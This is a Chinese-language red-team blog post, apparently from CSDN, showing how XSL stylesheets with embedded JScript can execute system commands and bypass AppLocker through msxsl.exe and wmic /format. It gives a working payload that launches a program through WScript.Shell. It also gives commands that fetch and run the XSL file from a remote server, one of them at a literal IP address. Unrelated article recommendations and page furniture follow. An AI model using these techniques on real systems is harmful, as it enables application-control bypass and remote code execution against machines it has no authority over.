XSL Script Processing

最新推荐文章于 2023-12-04 19:07:06 发布
最新推荐文章于 2023-12-04 19:07:06 发布
阅读量189 收藏
点赞数
分类专栏: Red Team
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44216796/article/details/112591323
版权

XSL指扩展样式语言(Extensibel Style Language)。万维网联盟(W3C)开始发展XSL的原因是:存在着对于基于XML的样式表语言的需求。在红蓝对抗中,使用XSL文件执行恶意代码有时可以帮助我们绕过APPLocker。下面介绍两种利用手段。

命令执行

技术复现(msxsl.exe)

msxsl.exe是微软用于命令行下处理XSL的一个程序,通过它我们可以执行XSL内的JavaScript进而执行系统命令。

下载地址:https://www.microsoft.com/en-us/download/confirmation.aspx?id=21714。

msxsI命令行接收形为msxsl.exe {xmlfile} {xslfile}的参数。由于XSL算是一种特殊的XML,我们可以使用msxsl.exe {xslfile} {xslfile}调用xsl文件内的命令。

<?xml version='1.0'?>
<xsl:stylesheet version="1.0" 
xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
xmlns:msxsl="urn:schemas-microsoft-com:xslt" 
xmlns:user="https://www.dbappsecurity.com.cn">

<msxsl:script language="JScript" implements-prefix="user">
	function xml(nodelist){
	var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
	return nodelist.nextNode().xml;
	}
</msxsl:script>
<xsl:template match="/">
		<xsl:value-of select="user:xml(.)"/>
</xsl:template>
</xsl:stylesheet>

本地执行

msxsl.exe Ail.xsl Ail.xsl

在这里插入图片描述

远程执行

msxsl.exe http://xxx/Ail.xsl http://xxx/Ail.xsl

在这里插入图片描述

技术复现

wmic可以通过形如:wmic.exe {wmic_command} /FORMAT:{xsl_file}的方式执行xsI内的恶意代码。{wmic command内可以填写任意的wmic可执行的命令}

本地执行

wmic process get name /format:Ail.xsl

在这里插入图片描述

远程执行

wmic process get name /format:"http://104.243.21.177/Ail.xsl"

在这里插入图片描述

AZ09WY
关注
专栏目录
spring-task
悟已往之不谏,知来者之可追
10-17 636
文章目录开头定时器用法解析注册schedulerscheduled-tasks调度执行scheduler初始化任务调度TriggerCron解析调度总结异步执行配置原理 开头 从功能上来说,spring-task这个组件主要包括了两个/两种功能: 任务的定时调度/执行,对应xml配置的task:scheduler和task:scheduled-tasks标签。 方法异步执行,对应xml配置的task:executor标签。 task:annotation-driven标签被以上两种功能共有。下面就这两种
实战Jmeter报告优化
我是怪侠怪的博客
03-07 2386
对于Jmeter报告的优化,首先要借助ant,另外修改jmeter-results-detail-report_21.xsl 文件,你也可以直接复制黏贴
Task1 Python基础入门:变量与异常处理(第三天)
jshmxwc的博客
09-08 596
Task1 Python基础入门:变量与异常处理(第3天) 一般异常处理: try: 执行 except A as e: # 异常错误 执行 存在finally的异常: try: 执行 except: #条件执行 执行 … finally: #必须执行 执行 存在else的异常: try: 执行 except: 执行 else: #执行try的内容时,else执行,否则不执行 执行
SpringTask
lemonmr的博客
06-04 445
1.定时任务解决方案-SpringTask Spring3.0以后自主开发的定时任务工具,spring-task,可以将它比作一个轻量级的.Quartz,而且使用起来很简单,除spring相关的包外不需要额外的包,而且支持注解和 配置文件两种形式 快速入门 测试代码,每间隔一秒自动输出 (1)在qingcheng_common_web工程下的配置文件applicationContext-config.xml中添加配置 <!‐‐开启任务调度‐‐> <task:annotation‐drive
spring task
weixin_36667844的博客
12-06 441
任务调度器 引用命名空间调用 配置最大线程数 编写作业任务类 测试 以下是我的applicationContext.xml配置: <!-- 扫描该包及该包下的子包 --> <context:component-scan base-package="com.zjm"/> <!-- 定时任务配置:最大线程数 --> <task:scheduler id="qbSched
xsl-fo基础知识
04-06
- **条件处理(Conditional Processing)**: 通过`xsl:if`、`xsl:when`和`xsl:otherwise`来实现不同情况下的内容展示。 - **媒体类型(Media Types)**: 可以根据不同的输出设备(如屏幕、打印机)设置不同的样式和...
使用Intel NCS算力棒 安装部署记录 VirtualBox With Ubuntu16.04 Source Aliyun
夜澜偶作庄周梦 酒后聊为楚客狂
12-08 3344
安装环境:VirtualBox  操作系统:Ubuntu 16.04 Desktop 注:VirtualBox需要安装扩展包,后面需要用到USB3.0 1、安装ubuntu,安装完毕后ubutu系统中切换镜像源,如切换成阿里云等,开始升级ubuntu sudo apt-get update sudo apt-get upgrade #deb包 deb http://mirrors.aliy...
几乎所有编程语言的hello, world程序(3)
nomasp
04-29 5903
LSL// Hello World in Linden Scripting Language (LSL)default { state_entry() { llSay(0, "Hello World"); } }Lua# Hello World in Luaprint "Hello world"m4# Hello World for the m4 macro
Oracle CC&B的研究
热门推荐
田攀的日志
08-12 1万+
Oracle CC&B资料非常的少,花了些时间研究了下CC&B,分享了。 Oracle CC&B全称Oracle Utilities Customer Care and Billing Solutions(即Oracle公用事业-客户服务、计费解决方案)。
finally在return之后也会执行吗
最新发布
m0_57236802的博客
12-04 1766
是的,finally块中的代码会在return语句之后执行。在 Java 中,语句块确保finally块总是被执行,无论try块内部发生了什么情况——无论是正常结束、遇到return语句还是抛出异常。这种行为使得finally块成为执行清理工作的理想位置,例如关闭文件、释放资源或其他必须执行的清理操作。
轻量级Spring定时任务(Spring-task)
dianfu9127的博客
02-18 114
Spring3.0以后自主开发的定时任务工具,spring-task,可以将它比作一个轻量级的Quartz,而且使用起来很简单,除spring相关的包外不需要额外的包,而且支持注解和配置文件两种形式。 第一种:基于注解 1、spring.xml中对应位置加入 xmlns:task="http://www.springframework.org/schema/task" ...
Spring Task
给自己一个前行的动力
03-03 854
Spring Task 是 Spring3.0 以后自主开发的定时任务工具,相当于一个轻量级的Quartz,使用起来相当简单,也不需要依赖额外的包,支持注解和配置文件两种形式
任务调度线程池
weixin_30650039的博客
10-17 208
1、上代码: public class ScheduledExecutorServiceDeom { public static void main(String[] args) { ScheduledExecutorService ses = Executors.newScheduledThreadPool(10); ses.scheduleAtFixedRate(...
理解XSL:从CSS语句到XSL转换
本文档介绍了CSS样式表的基本概念和一个简单的CSS语句示例,并延伸讨论了XSL语言,包括其语法和应用实例。通过学习,读者将了解如何结合使用XML和XSL来处理和展示数据。 在网页设计中,CSS(层叠样式表)是一种关键...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值